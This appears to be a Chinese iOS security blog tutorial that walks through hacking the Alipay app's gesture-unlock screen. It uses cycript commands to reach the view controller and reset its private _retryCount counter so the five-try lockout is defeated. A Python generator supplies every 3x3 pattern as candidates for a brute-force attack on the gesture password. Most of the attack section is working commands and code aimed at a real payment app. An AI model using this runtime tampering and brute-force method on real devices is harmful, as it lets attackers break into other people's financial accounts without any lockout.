iOS Security Attack and Defense (7): Hack in practice, removing the gesture-unlock retry limit in the Alipay app

Hack in practice: removing the gesture-unlock retry limit in the Alipay app

The previous posts only introduced the tools. This one puts them to work: we combine cycript with class-dump output to hack a real target, and the Alipay app gets to be the victim.

First, the usual routine: grab the view controller behind the gesture-unlock screen:

cy# var app = [UIApplication sharedApplication]
@""
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = ; layer = >"
cy# var root = keyWindow.rootViewController
@""
cy# var visible = root.visibleViewController
@""

Next, cross-reference the class-dump-z output to see what in GestureUnlockViewController is worth exploiting:

@interface GestureUnlockViewController : DTViewController  {
@private
	GestureHeadImageView* _headImageView;
	GestureTipLabel* _tipLabel;
	GestureInputView* _inputView;
	DTButton* _forgetButton;
	DTButton* _changeAccountButton;
	int _retryCount;
	UIView* _guideView;
	id _delegate;
}
@property(assign, nonatomic) __weak id delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end

By inspection, _tipLabel is the label that shows the account name and the prompt. As mentioned in the previous article, @private does not stop key-path access, so let's change the account name displayed on the Alipay login screen:

cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]

Alipay's gesture-password unlock limits the number of attempts: five consecutive wrong patterns and you are forced to log in again.
I wanted to remove that retry limit, and found that the attempt counter is stored as a plain int, `int _retryCount`. That was disappointing, because I could not set it through KVC the way I set the label text. (Strictly speaking, KVC's direct-ivar fallback will unbox an NSNumber into a scalar ivar, so setValue:forKey: would also work here; the pointer route below is just the most direct one in cycript.)

No matter: the ivar can be written straight through the object pointer:

cy# visible->_retryCount = 0
0

With the counter reset after every failed attempt, I can brute-force the gesture password programmatically with no lockout at all. So how many candidate patterns are there?

That number is a bit large for me, but for the iPhone 5's CPU it is a trivial amount of work.
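The article's count of possible patterns is not reproduced on this page, so the following is an added example (my own code, not the article's or Alipay's) that enumerates the candidate space a brute force would have to walk. It assumes, since the article does not say, that Alipay's gesture lock follows the common Android-style rules: a 3x3 grid, 4 to 9 distinct points, and a stroke may only pass over an intermediate point if that point is already part of the pattern. Under those rules the generator doubles as the candidate source for the brute force: each yielded tuple is one pattern to submit, with `_retryCount` zeroed in between.

```python
# Added example, not from the original article. ASSUMPTION: Android-style rules
# (3x3 grid, 4..9 distinct points, no jumping over an unvisited point); the
# article does not document Alipay's actual pattern rules.
from typing import Dict, Iterator, List, Optional, Tuple

GRID = 3
POINTS = GRID * GRID  # points are indexed 0..8, row-major (0 = top-left)


def midpoint(a: int, b: int) -> Optional[int]:
    """Return the grid point lying exactly between a and b, or None if the
    straight stroke a->b does not pass over a third point."""
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None  # no integer midpoint: adjacent or knight-like move
    return ((ra + rb) // 2) * GRID + (ca + cb) // 2


def gen_patterns(min_len: int = 4, max_len: int = POINTS) -> Iterator[Tuple[int, ...]]:
    """Yield every valid pattern as a tuple of point indices (DFS order).
    Each tuple is one candidate a brute force would submit to the unlock code."""

    def walk(path: List[int], visited: int) -> Iterator[Tuple[int, ...]]:
        if len(path) >= min_len:
            yield tuple(path)  # copy: the list below is mutated in place
        if len(path) == max_len:
            return
        last = path[-1]
        for nxt in range(POINTS):
            if visited & (1 << nxt):
                continue  # a point may appear in the pattern only once
            m = midpoint(last, nxt)
            if m is not None and not visited & (1 << m):
                continue  # stroke would jump over a point not yet used
            path.append(nxt)
            yield from walk(path, visited | (1 << nxt))
            path.pop()

    for start in range(POINTS):
        yield from walk([start], 1 << start)


def count_by_length(min_len: int = 4, max_len: int = POINTS) -> Dict[int, int]:
    """Number of valid patterns for each length, keyed by length."""
    counts: Dict[int, int] = {}
    for p in gen_patterns(min_len, max_len):
        counts[len(p)] = counts.get(len(p), 0) + 1
    return counts


def total_patterns(min_len: int = 4, max_len: int = POINTS) -> int:
    """Size of the whole search space the brute force has to cover."""
    return sum(count_by_length(min_len, max_len).values())


def pattern_to_string(p: Tuple[int, ...]) -> str:
    """Render a pattern as keypad digits 1..9, e.g. (0, 1, 2, 5) -> '1236'."""
    return "".join(str(i + 1) for i in p)


if __name__ == "__main__":
    by_len = count_by_length()
    for length in sorted(by_len):
        print(f"{length} points: {by_len[length]}")
    print("total:", sum(by_len.values()))
    # First few candidates the brute-force loop would try:
    for i, p in enumerate(gen_patterns()):
        if i == 5:
            break
        print(pattern_to_string(p))
```

The search space is small enough that ordering matters more than raw speed: a real brute force would try short, common patterns first, and the counter reset shown above is what makes walking the whole list feasible at all.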

Wait, though: what format does the password take?

-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;

The password is typed as a bare id. Very tidy, and it makes the hack noticeably more work, since the declaration tells us nothing about what the object actually is.

Still, that is no obstacle: we can use Method Swizzling to intercept the call and print what password really contains. That, however, seems to deserve an article of its own...
